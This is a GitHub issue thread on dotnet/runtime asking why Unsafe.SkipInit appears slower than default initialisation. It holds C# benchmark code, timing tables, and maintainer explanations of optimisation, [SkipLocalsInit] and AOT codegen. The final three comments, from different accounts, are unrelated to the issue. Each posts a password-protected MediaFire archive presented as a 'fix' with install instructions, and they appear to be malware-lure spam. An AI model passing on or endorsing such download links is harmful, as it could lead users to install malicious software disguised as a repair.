### ISSUE TITLE
[Question] Why the `Unsafe.SkipInit(out T)` is slowly than `T t = default`?

### ISSUE THREAD

**Issue by Cricle** [dotnet/runtime#107068]
```csharp
using BenchmarkDotNet.Analysers;
using BenchmarkDotNet.Attributes;
using BenchmarkDotNet.Configs;
using BenchmarkDotNet.Environments;
using BenchmarkDotNet.Jobs;
using BenchmarkDotNet.Running;
using BenchmarkDotNet.Validators;
using System.Runtime.CompilerServices;

internal class MyConfig : ManualConfig
{
    public MyConfig()
    {
        AddLogger(BenchmarkDotNet.Loggers.ConsoleLogger.Unicode);
        AddJob(Job.MediumRun.WithPlatform(Platform.X64).WithGcServer(true).WithRuntime(CoreRuntime.Core80));
        AddJob(Job.MediumRun.WithPlatform(Platform.X64).WithGcServer(true).WithRuntime(NativeAotRuntime.Net80).WithId("AOT"));
        AddExporter(BenchmarkDotNet.Exporters.MarkdownExporter.GitHub);
        AddAnalyser(EnvironmentAnalyser.Default
            , OutliersAnalyser.Default
            , MinIterationTimeAnalyser.Default
            , MultimodalDistributionAnalyzer.Default
            , RuntimeErrorAnalyser.Default
            , ZeroMeasurementAnalyser.Default
            , BaselineCustomAnalyzer.Default
            , HideColumnsAnalyser.Default
            );
        AddValidator(BaselineValidator.FailOnError
            , SetupCleanupValidator.FailOnError
            , JitOptimizationsValidator.FailOnError
            , RunModeValidator.FailOnError
            , GenericBenchmarksValidator.DontFailOnError
            , DeferredExecutionValidator.FailOnError
            , ParamsAllValuesValidator.FailOnError
            );
        AddColumnProvider(BenchmarkDotNet.Columns.DefaultColumnProviders.Instance);
    }
    private static void Main(string[] args)
    {
        BenchmarkRunner.Run<StructCreateBenchmark>(new MyConfig());
    }
}
[RankColumn]
[MemoryDiagnoser]
[MemoryRandomization]
public unsafe class StructCreateBenchmark
{
    [Benchmark(Baseline =true)]
    public void UseSkip()
    {
        Unsafe.SkipInit(out Test t);
    }
    [Benchmark]
    public void UseDefault()
    {
        Test t = default;
    }
}
unsafe struct Test
{
    public fixed byte tt[256];
}
```

The result is 
```
BenchmarkDotNet v0.14.0, Windows 10 (10.0.19045.2006/22H2/2022Update)
AMD Ryzen 7 5800H with Radeon Graphics, 1 CPU, 16 logical and 8 physical cores
.NET SDK 8.0.303
  [Host]    : .NET 8.0.7 (8.0.724.31311), X64 RyuJIT AVX2
  AOT       : .NET 8.0.7, X64 NativeAOT AVX2
  MediumRun : .NET 8.0.7 (8.0.724.31311), X64 RyuJIT AVX2

OutlierMode=DontRemove  Platform=X64  Server=True  
IterationCount=15  LaunchCount=2  MemoryRandomization=True  
WarmupCount=10  

```
| Method     | Job       | Runtime       | Mean      | Error     | StdDev    | Median    | Ratio | RatioSD | Rank | Allocated | Alloc Ratio |
|----------- |---------- |-------------- |----------:|----------:|----------:|----------:|------:|--------:|-----:|----------:|------------:|
| UseSkip    | AOT       | NativeAOT 8.0 | 0.6070 ns | 0.0251 ns | 0.0376 ns | 0.6062 ns |  1.00 |    0.09 |    2 |         - |          NA |
| UseDefault | AOT       | NativeAOT 8.0 | 0.0140 ns | 0.0107 ns | 0.0160 ns | 0.0097 ns |  0.02 |    0.03 |    1 |         - |          NA |
|            |           |               |           |           |           |           |       |         |      |           |             |
| UseSkip    | MediumRun | .NET 8.0      | 0.5744 ns | 0.0386 ns | 0.0577 ns | 0.5784 ns |  1.01 |    0.14 |    2 |         - |          NA |
| UseDefault | MediumRun | .NET 8.0      | 0.0346 ns | 0.0396 ns | 0.0593 ns | 0.0000 ns |  0.06 |    0.10 |    1 |         - |          NA |

**Comment by tannergooding** [comment]
Because you're not measuring realistic code and `UseDefault` is optimizing away everything so that its an empty method.

Additionally, values are implicitly zeroed already so you need `[SkipLocalsInit]` to actually skip any overhead. `Unsafe.SkipInit(out T)` basically just exists to bypass the language definite assignment rules

**Comment by huoyaoyuan** [comment]
https://sharplab.io/#v2:C4LghgzgtgPgAgJgIwFgBQcAMACOSB0ASgK4B2wAllAKb4DCA9lAA4UA21ATgMpcBuFAMbUIAbnRwAzNjIQwAM2q4E2bsE7FBwOp2phg1AELVSggBZQwnANboA3umxPc0uABZsAVQjVu1iswAFACUjs4OaM5RXqRyivh+AQCSpBTAgQzEwNgAKiLZwMHikc4AvmFOFS64Ht7UACLU8mDEbOmhJU4R0c55EAXYALzYACZNLW3FUeVoM7IKSv0aWrn59lVS2PIUAB7UI9gARgCeBtjAwADaCACsAGwAusWlQA=

For the method `UseDefault`, the variable is optimized away and the method becomes a nop. C# compiler doesn't ever generate IL for it.

You should, at very least, pass the result struct to a `NoInline` method to avoid it being optimized away.

**Comment by Cricle** [comment]
I use this code
```csharp
[RankColumn]
[MemoryDiagnoser]
[MemoryRandomization]
public unsafe class StructCreateBenchmark
{
    [Benchmark(Baseline =true)]
    public void UseSkip()
    {
        Unsafe.SkipInit(out Test t);
        t.tt[0] = 1;
    }
    [Benchmark]
    public void UseDefault()
    {
        Test t = default;
        t.tt[0] = 1;
    }
}
unsafe struct Test
{
    public fixed byte tt[256];
}
```
The result is 
```

BenchmarkDotNet v0.14.0, Windows 10 (10.0.19045.2006/22H2/2022Update)
AMD Ryzen 7 5800H with Radeon Graphics, 1 CPU, 16 logical and 8 physical cores
.NET SDK 8.0.303
  [Host]    : .NET 8.0.7 (8.0.724.31311), X64 RyuJIT AVX2
  AOT       : .NET 8.0.7, X64 NativeAOT AVX2
  MediumRun : .NET 8.0.7 (8.0.724.31311), X64 RyuJIT AVX2

OutlierMode=DontRemove  Platform=X64  Server=True  
IterationCount=15  LaunchCount=2  MemoryRandomization=True  
WarmupCount=10  

```
| Method     | Job       | Runtime       | Mean      | Error     | StdDev    | Ratio | RatioSD | Rank | Allocated | Alloc Ratio |
|----------- |---------- |-------------- |----------:|----------:|----------:|------:|--------:|-----:|----------:|------------:|
| UseSkip    | AOT       | NativeAOT 8.0 | 0.5865 ns | 0.0224 ns | 0.0335 ns |  1.00 |    0.08 |    2 |         - |          NA |
| UseDefault | AOT       | NativeAOT 8.0 | 0.5302 ns | 0.0148 ns | 0.0222 ns |  0.91 |    0.06 |    1 |         - |          NA |
|            |           |               |           |           |           |       |         |      |           |             |
| UseSkip    | MediumRun | .NET 8.0      | 0.3316 ns | 0.0348 ns | 0.0522 ns |  1.02 |    0.22 |    1 |         - |          NA |
| UseDefault | MediumRun | .NET 8.0      | 0.3834 ns | 0.0398 ns | 0.0596 ns |  1.18 |    0.25 |    1 |         - |          NA |

Is the AOT result normal?

**Comment by tannergooding** [comment]
You likely want benchmarks that look more like:
```csharp
public unsafe class StructCreateBenchmark
{
    [Benchmark]
    public Test UseSkipInit()
    {
        Unsafe.SkipInit(out Test t);
        return t;
    }

    [Benchmark]
    [SkipLocalsInit]
    public Test UseSkipInitAndSkipLocalsInit()
    {
        Unsafe.SkipInit(out Test t);
        return t;
    }

    [Benchmark(Baseline = true)]
    public Test UseDefault()
    {
        return default;
    }

    [Benchmark]
    [SkipLocalsInit]
    public Test UseDefaultAndSkipLocalsInit()
    {
        return default;
    }
}
```

But it's worth noting that this has its own pessimizations, is likely inaccurate due to how small the time measurements are, is using the older `fixed-sized buffer` instead of the newer `InlineArray` feature, and may not be representative of how the JIT optimizes such code for more realistic scenarios that are using the features as part of a more complex operations
-- 


.NET 9 using fixed-sized buffers:
```
BenchmarkDotNet v0.14.0, Windows 11 (10.0.26100.1586)
AMD Ryzen 9 7950X, 1 CPU, 32 logical and 16 physical cores
.NET SDK 9.0.100-preview.7.24407.12
  [Host]    : .NET 9.0.0 (9.0.24.40507), X64 RyuJIT AVX-512F+CD+BW+DQ+VL+VBMI
  MediumRun : .NET 9.0.0 (9.0.24.40507), X64 RyuJIT AVX-512F+CD+BW+DQ+VL+VBMI

OutlierMode=DontRemove  Platform=X64  Server=True
IterationCount=15  LaunchCount=2  MemoryRandomization=True
WarmupCount=10

| Method                       | Job       | Runtime       | Mean     | Error     | StdDev    | Median   | Ratio | RatioSD | Rank | Allocated | Alloc Ratio |
|----------------------------- |---------- |-------------- |---------:|----------:|----------:|---------:|------:|--------:|-----:|----------:|------------:|
| UseSkipInit                  | MediumRun | .NET 9.0      | 6.3639 ns | 0.1001 ns | 0.1498 ns |  6.78 |    0.22 |    3 |         - |          NA |
| UseSkipInitAndSkipLocalsInit | MediumRun | .NET 9.0      | 1.6615 ns | 0.0375 ns | 0.0562 ns |  1.77 |    0.07 |    2 |         - |          NA |
| UseDefault                   | MediumRun | .NET 9.0      | 0.9390 ns | 0.0150 ns | 0.0225 ns |  1.00 |    0.03 |    1 |         - |          NA |
| UseDefaultAndSkipLocalsInit  | MediumRun | .NET 9.0      | 0.9620 ns | 0.0310 ns | 0.0464 ns |  1.03 |    0.05 |    1 |         - |          NA |
```

.NET 9 using inline array:
```
BenchmarkDotNet v0.14.0, Windows 11 (10.0.26100.1586)
AMD Ryzen 9 7950X, 1 CPU, 32 logical and 16 physical cores
.NET SDK 9.0.100-preview.7.24407.12
  [Host]    : .NET 9.0.0 (9.0.24.40507), X64 RyuJIT AVX-512F+CD+BW+DQ+VL+VBMI
  MediumRun : .NET 9.0.0 (9.0.24.40507), X64 RyuJIT AVX-512F+CD+BW+DQ+VL+VBMI

OutlierMode=DontRemove  Platform=X64  Server=True
IterationCount=15  LaunchCount=2  MemoryRandomization=True
WarmupCount=10

| Method                       | Job       | Runtime       | Mean     | Error     | StdDev    | Median   | Ratio | RatioSD | Rank | Allocated | Alloc Ratio |
|----------------------------- |---------- |-------------- |---------:|----------:|----------:|---------:|------:|--------:|-----:|----------:|------------:|
| UseSkipInit                  | MediumRun | .NET 9.0      | 6.648 ns | 0.1803 ns | 0.2698 ns | 6.454 ns |  6.04 |    1.49 |    2 |         - |          NA |
| UseSkipInitAndSkipLocalsInit | MediumRun | .NET 9.0      | 1.442 ns | 0.1876 ns | 0.2808 ns | 1.432 ns |  1.31 |    0.41 |    1 |         - |          NA |
| UseDefault                   | MediumRun | .NET 9.0      | 1.169 ns | 0.1943 ns | 0.2908 ns | 1.156 ns |  1.06 |    0.37 |    1 |         - |          NA |
| UseDefaultAndSkipLocalsInit  | MediumRun | .NET 9.0      | 1.234 ns | 0.2064 ns | 0.3090 ns | 1.402 ns |  1.12 |    0.39 |    1 |         - |          NA |
```

Where the differences here are partially due to time mismeasurements and partially due to `return default;` because special cased because it doesn't require an intermediate local. Where-as `UseSkipInit*` ends up deciding to use `memcpy` instead, due to the size of the struct; unless you're on a machine with AVX512 support.

**Comment by tannergooding** [comment]
> Is the AOT result normal?

Yes. AOT has to default to targeting a portable machine, and so can only use things like SSE2 by default. While the JIT can target "your" machine, which likely has AVX support and so can do half the mov operations for a 256-byte struct.

-------------------------------

In general, `Unsafe.SkipInit(out result)` can be presumed to be a `no-op`, and in fact that's exactly what we produce in most cases is a `gtNewNothingNode`: https://github.com/dotnet/runtime/blob/main/src/coreclr/jit/importercalls.cpp#L5286-L5302

There are some edge cases, mostly involving atypical code patterns, where this can result in slightly worse codegen (such as because the value was considered address taken or similar). But in practice it will not impact codegen at all. You can then use `[SkipLocalsInit]` to bypass implicit zeroing of the data by the runtime, which comes with its own risks, but ensures that the data is actually not assigned if used in conjunction with `Unsafe.SkipInit`

**Comment by Cricle** [comment]
I got it, thanks @tannergooding and @huoyaoyuan

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
